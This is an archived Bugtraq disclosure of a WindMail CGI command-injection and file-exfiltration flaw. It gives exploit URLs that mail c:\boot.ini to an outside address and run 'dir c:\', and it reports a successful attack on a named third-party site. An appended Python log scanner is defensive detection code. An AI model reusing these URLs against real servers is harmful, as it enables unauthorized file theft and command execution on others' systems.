[14426] in bugtraq


Windmail allow web user get any file

daemon@ATHENA.MIT.EDU (Frankie Zie)
Tue Mar 28 00:30:30 2000

Message-Id:  <20000325224146.6839.qmail@securityfocus.com>
Date:         Sat, 25 Mar 2000 22:41:46 -0000
Reply-To: Frankie Zie <frankie@CNNS.NET>
From: Frankie Zie <frankie@CNNS.NET>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

I found some vulnerabilities when WindMail runs as a CGI
application. Tested successfully on Windows NT 4.0, WindMail 3.05.
WindMail is a 32-bit Windows console program by Geocel that
gives you command-line e-mail messaging capability.
You can download an evaluation copy of WindMail 3.0 at:
http://www.geocel.com/download/wmail301e.exe

WindMail has a feature that allows mailing HTML form results
from CGI scripts.
I found that WindMail checks neither the attachment file nor
special characters in the parameters, which allows you to execute
any command the web user account can run:
http://xx.com/cgi-bin/WINDMAIL.EXE?%20-n%20c:\boot.ini%20yourmail@mail.com%20|%20dir%20c:\
After the request, WindMail will send c:\boot.ini to
yourmail@mail.com and execute the "dir c:\" command.

For example:
http://www.metro.net/cgi-bin/windmail.exe?-n%20c:\boot.ini%20chinahack@163.net
After a while, checking chinahack@163.net, I got a copy of
boot.ini from www.metro.net.
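Added example (not part of the post above): a small Python checker that a site operator could run over web-server access logs to spot requests to WINDMAIL.EXE that carry the attachment switch (-n) with an absolute path, or shell metacharacters, the two patterns the post describes. The log layout (date time client method uri-stem uri-query status) and the sample lines are constructed for this example, not real logs.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines in a simplified W3C-style layout:
# date time client method uri-stem uri-query status   (not real logs)
SAMPLE_LOG = r"""2000-03-25 22:41:46 10.0.0.5 GET /cgi-bin/windmail.exe -n%20c:\boot.ini%20user@example.com%20|%20dir%20c:\ 200
2000-03-25 22:42:10 10.0.0.9 GET /cgi-bin/WINDMAIL.EXE -n%20c:\boot.ini%20user@example.com 200
2000-03-25 22:43:01 10.0.0.7 GET /cgi-bin/windmail.exe -t%20user@example.com%20-s%20Feedback 200
2000-03-25 22:44:12 10.0.0.7 GET /index.html - 200
"""

# Characters the Windows command interpreter treats specially
SHELL_META = set("|&<>^")

# -n followed by a drive-letter path, a UNC path, or a traversal sequence
ATTACH_RE = re.compile(r"(?i)(?:^|\s)-n\s+(?:[a-z]:\\|\\\\|\.\.)")


def analyze_request(uri_stem, uri_query):
    """Return the list of findings for one request (empty if not suspicious)."""
    findings = []
    if not uri_stem.lower().endswith("windmail.exe"):
        return findings
    # Decode %20 etc. so we inspect what WindMail actually receives
    query = unquote(uri_query)
    if ATTACH_RE.search(query):
        findings.append("attachment-flag-with-absolute-path")
    if SHELL_META & set(query):
        findings.append("shell-metacharacter")
    return findings


def scan_log(text):
    """Return (client, uri-stem, findings) for every suspicious request in the log."""
    alerts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue  # malformed or truncated line, skip it
        client, stem, query = parts[2], parts[4], parts[5]
        findings = analyze_request(stem, query)
        if findings:
            alerts.append((client, stem, findings))
    return alerts


if __name__ == "__main__":
    for client, stem, findings in scan_log(SAMPLE_LOG):
        print(client, stem, ", ".join(findings))
```

In a CGI deployment any use of -n by a remote client is worth reviewing, so the attachment check can be loosened to match -n alone if the false-positive rate allows it.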
 
pp@cnns.net
http://www.cnns.net 
